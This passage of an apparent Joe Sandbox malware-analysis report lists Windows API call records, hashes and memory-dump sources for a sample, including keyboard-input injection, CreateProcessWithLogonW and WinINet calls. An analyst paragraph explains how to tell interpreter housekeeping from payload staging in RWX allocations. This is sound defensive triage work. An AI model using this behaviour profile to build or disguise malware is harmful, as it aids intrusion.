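Run against the lines above, 80017FFF decodes to UDM_SETRANGE with a signed range of -32767 to 32767 and 00640000 to TBM_SETRANGE 0 to 100, i.e. default GUI control setup rather than anything the operator configured. The runtime-resolved exports (GetNativeSystemInfo, the Wow64 file-system-redirection pair, RegDeleteKeyExW, GetModuleHandleExW) are the ones a portable Win32 program looks up because they are missing on older Windows versions, so they are weak indicators on their own; Wow64DisableWow64FsRedirection still deserves a note because it lets a 32-bit process reach the real System32 directory. The one record that stands out once decoded is the VirtualAlloc at 008FE301: a 119-byte MEM_COMMIT|MEM_RESERVE allocation with PAGE_EXECUTE_READWRITE followed immediately by _memmove is the pattern to inspect first when separating interpreter housekeeping from payload staging.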
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 008F80C3
                                    • CoUninitialize.COMBASE ref: 008F80CE
                                      • Part of subcall function 008DD56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008DD5D4
                                    • VariantInit.OLEAUT32(?), ref: 008F80D9
                                    • VariantClear.OLEAUT32(?), ref: 008F83AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 626cea1fe5b16444864b44f025a0591400a32dffac6e76844c28865f51de1aee
                                    • Instruction ID: c3ffd626d1f98126262a4f839ac6b11d0b08c4d72e5968f3f1e259851b84e0ad
                                    • Opcode Fuzzy Hash: 626cea1fe5b16444864b44f025a0591400a32dffac6e76844c28865f51de1aee
                                    • Instruction Fuzzy Hash: 4CA126356047069FDB10EF68C881A2AB7E4FF89714F184558FA9ADB3A1CB30ED45CB42
                                    APIs
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D76EA
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008D7702
                                    • CLSIDFromProgID.COMBASE(?,?), ref: 008D7727
                                    • _memcmp.LIBCMT ref: 008D7748
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: b92887b99b9ad98c0af6b889f2f210f9052dd236295f4157418f2f1eb288c72b
                                    • Instruction ID: a6f7eabff3d0d88fb428f8c15971daf02beac53f61183ebf61be51e1fae6920d
                                    • Opcode Fuzzy Hash: b92887b99b9ad98c0af6b889f2f210f9052dd236295f4157418f2f1eb288c72b
                                    • Instruction Fuzzy Hash: 8B811C75A00109EFCB04DFA8C984DEEB7B9FF89315F204559E516EB250EB71AE06CB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: fe67372f2587ce521dd47f25c8ba85c6c268f85265ac4ced992d138549970706
                                    • Instruction ID: aebd328a53c1e40b9aed6f24a675c4cb9219489a0a6ca919fab18f29761e9e57
                                    • Opcode Fuzzy Hash: fe67372f2587ce521dd47f25c8ba85c6c268f85265ac4ced992d138549970706
                                    • Instruction Fuzzy Hash: A351B3746043099EDB24AF69D891A3AB7E5FF45314F20C91FE5C6DB791FA30D8A08702
                                    APIs
                                    • GetWindowRect.USER32(0156DEF0,?), ref: 00909863
                                    • ScreenToClient.USER32(00000002,00000002), ref: 00909896
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00909903
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 42841a40947d670f8bbe55e5123951894a3916408d482035948060ed30f804bb
                                    • Instruction ID: ec30eafd1bb4a1cc9cb56a02976952ef950408a5b9fab0758c6f44d742afcce9
                                    • Opcode Fuzzy Hash: 42841a40947d670f8bbe55e5123951894a3916408d482035948060ed30f804bb
                                    • Instruction Fuzzy Hash: F6513035A00209EFCF14DF58C884AAE7BB9FF56360F148159F8659B3A1D731AD81DB90
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008D9AD2
                                    • __itow.LIBCMT ref: 008D9B03
                                      • Part of subcall function 008D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008D9DBE
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008D9B6C
                                    • __itow.LIBCMT ref: 008D9BC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: a51e60aefeef062108bea10338ba57e5a255bf50279c20b81a8ccea64e7dbc7e
                                    • Instruction ID: 1a5434c48873e29901f6f7db3d83f124e89c6e73e580ffb5257505c46f8130fe
                                    • Opcode Fuzzy Hash: a51e60aefeef062108bea10338ba57e5a255bf50279c20b81a8ccea64e7dbc7e
                                    • Instruction Fuzzy Hash: 34416F74A00218ABDF21EF58D845BAEBFB9FF45724F00015AF945E7391DB709A44CB52
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EB89E
                                    • GetLastError.KERNEL32(?,00000000), ref: 008EB8C4
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EB8E9
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008EB915
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: d77d71371a89bb7e3794112361a626bcd62948ccd05e7df69cb50f16a96ca936
                                    • Instruction ID: b1d09e383efe521b410b67747a7c04aaa4f6a3b7f71bc7321482a0806c881c79
                                    • Opcode Fuzzy Hash: d77d71371a89bb7e3794112361a626bcd62948ccd05e7df69cb50f16a96ca936
                                    • Instruction Fuzzy Hash: B541FB35600552DFCB11EF19C455A6ABBE1FF4A314F198098ED8A9B762CB30FD01DB92
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009088DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 288aa17570063a60aa183013bd55b0568f03751b34771ee2cf3756346dbe3edb
                                    • Instruction ID: 9badf8312be947274fef0e59558225ceb4f7ae90070143cbc6d6800b23f7fcf4
                                    • Opcode Fuzzy Hash: 288aa17570063a60aa183013bd55b0568f03751b34771ee2cf3756346dbe3edb
                                    • Instruction Fuzzy Hash: 5331D434714108EFEB24AA58CC45FBE77A9EB06350F544512F9B1E62E1CE71D980AB52
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0090AB60
                                    • GetWindowRect.USER32(?,?), ref: 0090ABD6
                                    • PtInRect.USER32(?,?,0090C014), ref: 0090ABE6
                                    • MessageBeep.USER32(00000000), ref: 0090AC57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: ab615141ee127971dbde1e146fb1b8990aee66124641f58b0f3f2adb95517ca3
                                    • Instruction ID: 9dc915eec0ce2d10944761762c1f6bf9a0b48d8e7d91c8646e2fc9521c965ac3
                                    • Opcode Fuzzy Hash: ab615141ee127971dbde1e146fb1b8990aee66124641f58b0f3f2adb95517ca3
                                    • Instruction Fuzzy Hash: 6041AE34604229DFDB21DF58C884BA97BF9FF49300F1A80A9E854DB2A1D730E941DBD2
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008E0B27
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 008E0B43
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E0BA9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008E0BFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                    • Instruction ID: bfaa2d2aa31c06de4dee82e35fcf065b1564c97621f1c0f06ca0756c26505547
                                    • Opcode Fuzzy Hash: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                    • Instruction Fuzzy Hash: D7314A309442886EEB308B668C05BF9BBA9FB86328F144B5AF581D11D1C3F489C09F51
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 008E0C66
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 008E0C82
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E0CE1
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 008E0D33
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                    • Instruction ID: 7a6aad60efaa692f1afca4b19a31a4a5ce6606a0cef6c9d2e9851396bcd72bed
                                    • Opcode Fuzzy Hash: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                    • Instruction Fuzzy Hash: DB314830A0429C6EFF308B6A8C147FEBB66FB47310F244B1AE481D21D1C3B999C59B52
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B61FB
                                    • __isleadbyte_l.LIBCMT ref: 008B6229
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B6257
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B628D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: aff2a6561c96c76ed8503d49d8ac30d82916a6c0f479e24fc08038d790bd1ead
                                    • Instruction ID: 76b7365d9f3508190afa397536cbcb66a513a3569d52436078d682eaf314d923
                                    • Opcode Fuzzy Hash: aff2a6561c96c76ed8503d49d8ac30d82916a6c0f479e24fc08038d790bd1ead
                                    • Instruction Fuzzy Hash: EE31AE31A04246AFEF218F69CC44BBA7BA9FF42310F154029E864D72A1E735D961DB90
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 00904F02
                                      • Part of subcall function 008E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E365B
                                      • Part of subcall function 008E3641: GetCurrentThreadId.KERNEL32 ref: 008E3662
                                      • Part of subcall function 008E3641: AttachThreadInput.USER32(00000000,?,008E5005), ref: 008E3669
                                    • GetCaretPos.USER32(?), ref: 00904F13
                                    • ClientToScreen.USER32(00000000,?), ref: 00904F4E
                                    • GetForegroundWindow.USER32 ref: 00904F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: ce588fae6e2ee114f6ece072dc4766e26f1f0bbd922f85649b5422ce740bb896
                                    • Instruction ID: 0cf0edd02739db2528c3c50a57132916efbedc6f5c360ca52567991443acffb3
                                    • Opcode Fuzzy Hash: ce588fae6e2ee114f6ece072dc4766e26f1f0bbd922f85649b5422ce740bb896
                                    • Instruction Fuzzy Hash: 38312D71E00108AFCB10EFB9C8859EFB7F9FF99304F10406AE555E7251DA719E058BA1
                                    APIs
                                      • Part of subcall function 008D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8121
                                      • Part of subcall function 008D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D812B
                                      • Part of subcall function 008D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D813A
                                      • Part of subcall function 008D810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8141
                                      • Part of subcall function 008D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8157
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D86A3
                                    • _memcmp.LIBCMT ref: 008D86C6
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D86FC
                                    • HeapFree.KERNEL32(00000000), ref: 008D8703
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 2182266621-0
                                    • Opcode ID: c929d74388e0a9313bd7d038efb04149284b3fac4d9cc2d5aa13ee8d6f1bcab1
                                    • Instruction ID: fada22dd4d06abc14052cfe71289f81dad1ae72761c40bc7d80c66b70fb235d8
                                    • Opcode Fuzzy Hash: c929d74388e0a9313bd7d038efb04149284b3fac4d9cc2d5aa13ee8d6f1bcab1
                                    • Instruction Fuzzy Hash: 99215771E04208EFDB10DFA8D949BAEB7B8FF54314F15415AE444AB240EB30AE05DB90
                                    APIs
                                    • __setmode.LIBCMT ref: 008A09AE
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    • _fprintf.LIBCMT ref: 008A09E5
                                    • OutputDebugStringW.KERNEL32(?), ref: 008D5DBB
                                      • Part of subcall function 008A4AAA: _flsall.LIBCMT ref: 008A4AC3
                                    • __setmode.LIBCMT ref: 008A0A1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    • Opcode ID: b932586476877fb18e36d6c22bba1d8a0b2464c3839a2d38cca2513669c1f67b
                                    • Instruction ID: 77ee4553128fea0135998c5cc700f79aa0a81f87ef136e97246af3869530a514
                                    • Opcode Fuzzy Hash: b932586476877fb18e36d6c22bba1d8a0b2464c3839a2d38cca2513669c1f67b
                                    • Instruction Fuzzy Hash: F91127319042086FEB04B7BCAC479BE7B69FF87320F240126F105D6582EEA0584297A2
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F17A3
                                      • Part of subcall function 008F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F184C
                                      • Part of subcall function 008F182D: InternetCloseHandle.WININET(00000000), ref: 008F18E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                    • Instruction ID: fd94f43bad0f274b0350a27f0add65e4f12e376a94c2e7b7a4d7d14365b9aed5
                                    • Opcode Fuzzy Hash: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                    • Instruction Fuzzy Hash: 2B21B031214609FFEF129F748C04BBABBA9FF48751F14402AFA05D6550D7719911A7A1
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0090FAC0), ref: 008E3A64
                                    • GetLastError.KERNEL32 ref: 008E3A73
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008E3A82
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0090FAC0), ref: 008E3ADF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: 3f60b92178df2e88d2e8940c72279b89434fe95b056cf19c593d6fb3685a1248
                                    • Instruction ID: d6b14c62d13de139fc27d39441b1644bda20088bd25954108afeefc75daa7e34
                                    • Opcode Fuzzy Hash: 3f60b92178df2e88d2e8940c72279b89434fe95b056cf19c593d6fb3685a1248
                                    • Instruction Fuzzy Hash: 3721D6341086119FC710EF29D88586A77E8FF56368F104A2DF499C72A1D731DE85CB83
                                    APIs
                                      • Part of subcall function 008DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?), ref: 008DF0CB
                                      • Part of subcall function 008DF0BC: lstrcpyW.KERNEL32(00000000,?,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DF0F1
                                      • Part of subcall function 008DF0BC: lstrcmpiW.KERNEL32(00000000,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?), ref: 008DF122
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDCEC
                                    • lstrcpyW.KERNEL32(00000000,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDD12
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDD46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 86bf7cbaabf6aef4f04606bc38acb4b80bf116413c563318150ec743694ed913
                                    • Instruction ID: a0be294155fbc25d861b4332450208d96aee59d1c89e98c2408f1e78473ff409
                                    • Opcode Fuzzy Hash: 86bf7cbaabf6aef4f04606bc38acb4b80bf116413c563318150ec743694ed913
                                    • Instruction Fuzzy Hash: C011AC3A200305EFDB25AF64C84597A77AAFF46350B40822AF906CB3A1EB719950DB91
                                    APIs
                                    • _free.LIBCMT ref: 008B5101
                                      • Part of subcall function 008A571C: __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008A571C: __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008A571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 567e951994b1b8bdb96f5052dd9e5a8c23b0a6cd21f32e91f72cbce224200909
                                    • Instruction ID: a40908a179727e970d4aedba8bcb4de771709a28e0bb2cc5dab136ccc37c1ccb
                                    • Opcode Fuzzy Hash: 567e951994b1b8bdb96f5052dd9e5a8c23b0a6cd21f32e91f72cbce224200909
                                    • Instruction Fuzzy Hash: 8C11A372904A15EEDF312F7CBC45B9E3798FF063B1B204529FA04D6B61DE30994197A1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D85E2
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 008D85E9
                                    • CloseHandle.KERNEL32(00000004), ref: 008D8603
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                    • Instruction ID: 260ba0eedc19d614a287d2b15f7820e72fae4a894c95183d577f9d339643c0da
                                    • Opcode Fuzzy Hash: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                    • Instruction Fuzzy Hash: A5114A72504209EFDF118FA4ED49BEE7BA9FF08754F044165FE04E2160C7729E60AB61
                                    APIs
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
